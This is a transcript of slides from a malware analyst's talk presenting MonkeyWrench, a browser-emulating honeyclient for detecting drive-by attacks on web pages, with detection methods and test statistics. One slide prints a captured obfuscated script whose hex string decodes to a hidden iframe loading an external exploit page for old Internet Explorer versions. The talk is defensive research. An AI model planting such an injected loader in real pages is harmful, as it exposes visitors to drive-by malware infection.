detecting malicious web pages with monkeywrench
TRANSCRIPT
![Page 1: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/1.jpg)
1
Detecting malicious web pages with
MonkeyWrench
Armin Büscher
Developer / Malware Analyst
@ G Data SecurityLabs
![Page 2: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/2.jpg)
2
Agenda
• Malicious web pages
• MonkeyWrench
• Test runs
• monkeywrench.de
• Demo
• Future work
![Page 3: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/3.jpg)
3
Malicious web pages
• #1 infection vector of client computers
• Single visit of a malicious page can lead to
drive-by download of malware
![Page 4: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/4.jpg)
4
Malicious web pages:
Web exploit kits
![Page 5: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/5.jpg)
5
Malicious web pages:
Obfuscation<script>
var s='3C696672616D65207372633D22687474703A2F2F7777772E7669647
36E69636865732E636F6D2F746F702F7A2F7374617469632E7068703F73696
73D37373735373332383646364237353233363337373643334236413746374
437323444304334373439343522206865696768743D223222207374796C653
D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F6966726
16D653E';
var o='';
for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);
o=o+c+s.substr(i,2);}
var v=navigator.appVersion;
if (v.indexOf('MSIE 6.0') != -1)
{document.write(unescape(o));}
if (v.indexOf('MSIE 5.') != -1)
{document.write(unescape(o));}
</script>
<iframe
src=http://www.vid******s.com/top/z/static.php?sig=777573286F6
B752363776C3B6A7F7D724D0C474945 height =“2”
style=“display:none” width=“2”></iframe>
Build a fast Honeyclient system to
automatically detect and analyze
the bulk of web attacks
![Page 6: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/6.jpg)
6
• Low-interaction Web-Honeyclient
• Diploma thesis (Computer Science)
• Research project @ G Data SecurityLabs
![Page 7: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/7.jpg)
7
Low-interaction
• Honeyclient↔ Client-Honeypot
• Connect to web servers & check pages for malicious
content
• High-interaction:
• Regular system (often virtualized) with client software
driven by Honeyclient
• Detection similar to malware sandbox implementations
• Low-interaction:
• Emulation of client software (→ browser)
Web-Honeyclient
![Page 8: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/8.jpg)
8
MonkeyWrench: Project Goals
• Inspect websites faster than high-interaction systems
• Emulate browsers to deal with:
• sophisticated obfuscation techniques
• browser-specific behavior
• Deep analysis of web-based attacks to identify:
• stages of an attack
• preparative techniques
• attacked vulnerabilities
![Page 9: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/9.jpg)
9
![Page 10: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/10.jpg)
10
MonkeyWrench: Client
• Written in Java
• Multithreading of emulated browser instances
• Utilizes HTMLUnit (htmlunit.sourceforge.net)
• “GUI-less browser for Java programs”
• Unit tests of web pages
• Possible emulated browsers:
• Microsoft Internet Explorer 6/7/8
• Mozilla Firefox 2/3
![Page 11: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/11.jpg)
11
MonkeyWrench: Client architecture
![Page 12: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/12.jpg)
12
MonkeyWrench: Detection
• Vulnerability modules
• ActiveX (e.g. emulation of a buffer overflow)
• Browser / DOM / static HTML analysis
• Shellcode
• GetPC heuristics
• WinAPI search loops
• Heapspray / NOP-Sleds
• Entropy
• Heap usage
• AV signatures
![Page 13: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/13.jpg)
13
Test runs: Setup
• Quad core system running Debian Linux
• DSL 3 Mbit/s & (since 04/2010) VDSL 50 Mbit/s
• Feeding the beast:
• Google Hot Trends (→BH SEO)
• Customer reports
• Links parsed from spam mails
• malwaredomainlist.com, malc0de.com, …
![Page 14: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/14.jpg)
14
Test runs: Numbers
• >1.3 million web pages checked (since 12/2009)
• max. # checked pages/hour ~ 2,200
(1.63 sec per check)
• 84,526 attacks detected
• 12 GB of malicious or suspicious samples
downloaded (HTML, JS, PDF, EXE, …)
• 23,618 malicious executables
(~24% undetected by AV signatures)
• 6,292 shellcode payloads extracted
![Page 15: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/15.jpg)
15
0
10
20
30
40
50
60
70
80
90
100
CVE-2010-0249 „Aurora“
![Page 16: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/16.jpg)
16
0 %
10 %
20 %
30 %
40 %
50 %
60 %
70 %
Nov-09 Dec-09 Jan-10 Feb-10 Mar-10 Apr-10
Attacked vulnerabilities
CVE-2007-3147
CVE-2008-0015
CVE-2008-1309
CVE-2008-2463
CVE-2009-1136
CVE-2010-0249
CVE-2010-0806
Malicious PDFs
![Page 17: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/17.jpg)
17
monkeywrench.de
• Free web service
• Analyze malicious web pages with MonkeyWrench
• Community partners are welcome!
Demo
![Page 18: Detecting malicious web pages with MonkeyWrench](https://reader032.vdocuments.site/reader032/viewer/2022020702/61fb1eb02e268c58cd5a6156/html5/thumbnails/18.jpg)
18
Future Work
• Integrate PDF analysis into monkeywrench.de
• Karsten Tellmann‘s PDX-Ray
• Integrate shellcode sandbox
• Flash module